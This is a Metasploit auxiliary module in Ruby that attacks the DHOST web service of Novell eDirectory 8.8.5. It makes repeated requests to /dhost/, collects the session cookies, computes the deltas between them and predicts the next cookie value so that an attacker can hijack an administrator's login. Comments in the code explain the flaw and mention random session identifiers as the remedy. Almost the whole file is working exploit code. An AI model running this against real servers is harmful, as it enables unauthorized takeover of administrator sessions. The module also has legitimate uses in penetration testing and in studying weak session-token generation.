

  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata together with the two options #run reads:
  # RPORT (defaults to 8030) and SSL (defaults to enabled).
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Novell eDirectory DHOST Predictable Session Cookie',
      'Description' => %q{
        This module is able to predict the next session cookie value issued
        by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
        this module, wait until the real administrator logs in, then specify the
        predicted cookie value to hijack their session.
      },
      'References'  =>
        [
          ['OSVDB', '60035'],
        ],
      'Author'      => 'hdm',
      'License'     => MSF_LICENSE
    ))

    register_options([
      Opt::RPORT(8030),
      OptBool.new('SSL', [true, 'Use SSL', true])
    ])
  end

  # Requests /dhost/ six times, pulls the session cookie out of each response
  # and compares consecutive values. Fewer than four distinct deltas is
  # reported as predictable (next value = last value + first delta); otherwise
  # the distinct deltas are printed for the operator to judge.
  #
  # The weakness being checked is a session identifier that advances like a
  # counter rather than coming from a CSPRNG. On the defender's side the
  # remedy is cryptographically random session identifiers, regenerated at
  # login; repeated unauthenticated GETs to /dhost/ from one source are the
  # observable footprint of this check.
  def run
    vals = []
    name = ''

    # NOTE: the status line says 5 while the loop issues 6 requests; the
    # message is kept verbatim so output does not change.
    print_status("Making 5 requests to verify predictions...")

    6.times do
      connect
      request = [
        "GET /dhost/ HTTP/1.1\r\n",
        "Host: #{rhost}:#{rport}\r\n",
        "Connection: close\r\n\r\n"
      ].join
      sock.put(request)
      response = sock.get_once(-1, 5)
      disconnect

      match = response && response.match(/Cookie:\s*([^\s]+)\s*/mi)
      next unless match

      # Keep only "name=value" (drop attributes after ';'), then parse the
      # value as hexadecimal. A header without '=' raises here, as before.
      pair = match[1].split(';').first
      name, hex = pair.split('=')
      vals << hex.to_i(16)
    end

    deltas = []
    vals.each_cons(2).with_index(1) do |(earlier, current), idx|
      delta = current - earlier
      print_status("Cookie: #{idx} #{format('%.8x', current)} DELTA #{format('%.8x', delta)}")
      deltas << delta
    end
    prev_val = vals.last
    distinct = deltas.uniq

    # With no cookies collected prev_val/distinct[0] are nil and the addition
    # raises, matching the original behaviour.
    if distinct.length < 4
      print_status("The next cookie value will be: #{name}=#{format('%.8x', prev_val + distinct[0])}")
    else
      print_status("The cookie value is less predictable, maybe this has been patched?")
      print_status("Deltas: #{distinct.map { |d| format('%.8x', d) }.join(', ')}")
    end
  end
end